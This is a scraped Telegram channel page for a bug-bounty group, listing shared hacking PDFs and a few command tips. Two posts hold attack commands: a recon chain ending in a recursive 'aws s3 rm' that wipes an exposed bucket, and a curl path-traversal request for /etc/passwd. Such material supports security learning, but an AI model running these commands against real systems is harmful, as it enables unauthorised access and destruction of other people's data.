Brut Security
@brutsecurity
14.8K subscribers
941 photos
73 videos
287 files
985 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
About
Blog
Apps
Platform
Join
Brut Security
14.8K subscribers
Brut Security
The Top Hacker Methodologies & Tools Notes.pdf
523.8 KB
Top SSRF reports from HackerOne_.pdf
344.7 KB
Web Attack Cheat Sheet.pdf
744.5 KB
Web Cache Poisoning.pdf
110.2 KB
XSS Cheat Sheet.pdf
667.3 KB
xss-cheat-sheet-2020-edition-2-pdf-free.pdf
1.1 MB
2000+ Top XSS reports from HackerOne.pdf
2.4 MB
1704315080868.pdf
4.3 MB
Abusing HTTP Hop-by-hop request headers.pdf
96.2 KB
Anonymous_SQL-Injection-Encyclopedic.pdf
6 MB
πŸ”₯10πŸ‘8
4.66K viewsMr. Brut
Brut Security
Some Web Application Penetration testing or Bug Bounty notes :)

Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
mega.nz
30.4 KB file on MEGA
πŸ‘9πŸ”₯4
3.27K viewsMr. Brut
Brut Security
Bug Hunters Methodology v4
@Jason Haddix
πŸ‘9πŸ”₯4πŸ‘Ž3
2.79K viewsMr. Brut
Brut Security
πŸ‘©β€πŸ’»Take control of an S3 Bucket in less than a minuteπŸ‘©β€πŸ’»


echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon


aws s3 ls s3://REDACTEDCOM. s3. amazonaws. com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)


aws s3 rm s3://REDACTEDCOM. s3. amazonaws. com --recursive
(It's joke, don't be a bad guy and report that...)



⚑️Happy Hacking⚑️
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯4πŸ‘3
3.03K viewsMr. Brut
Brut Security
πŸ”₯6
2.91K viewsMr. Brut
Brut Security
Keep checking my old Posts to continue your learning Process!
πŸ‘9πŸ”₯3❀1
2.78K viewsMr. Brut
Brut Security
πŸ’₯Join Our Bugbounty Discussion Group πŸ’₯
πŸ”₯https://t.iss.one/brutsecπŸ”₯
πŸ€–https://discord.gg/GZBsQMY6πŸ€–
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Brut Security | Discussion
Community Discussion
2.93K viewsMr. Brut, edited  
Brut Security
Google Dorking for Pentesters.pdf
1.2 MB
πŸ”₯4
2.96K viewsMr. Brut
Brut Security
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨


This is how you can send such a request using #curl :

$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
πŸ‘9πŸ”₯4❀3πŸ₯°1
3.4K viewsMr. Brut
Brut Security
Park_Foreman_Vulnerability_Management,_Auerbach_Publications_2019.pdf
5.6 MB
πŸ”₯2
2.8K viewsMr. Brut
Brut Security
How_Attacker_Abuse_VSCode_as_RAT.pdf
1016.4 KB
Long_Password_DOS_Attack.pdf
195.1 KB
πŸ‘3πŸ”₯1
2.9K viewsMr. Brut
Brut Security
S3 Bucket Recon Method
πŸ‘17πŸ”₯2
3.29K viewsMr. Brut
Brut Security
JWT_Hacking.pdf
226.3 KB
πŸ”₯4
3.06K viewsMr. Brut
Brut Security
Attacking_AWS.pdf
1.6 MB
πŸ”₯4
3.28K viewsMr. Brut
Brut Security
Now you can detect phishing websites quickly with Nuclei❀

nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
❀3πŸ”₯3πŸ‘1
3.21K viewsMr. Brut
Brut Security
Pwning_the_Domain_DACL_Abuse_EBook.pdf
3.6 MB
❀3πŸ‘1πŸ”₯1
2.91K viewsMr. Brut
Brut Security
πŸ”₯8
2.61K viewsMr. Brut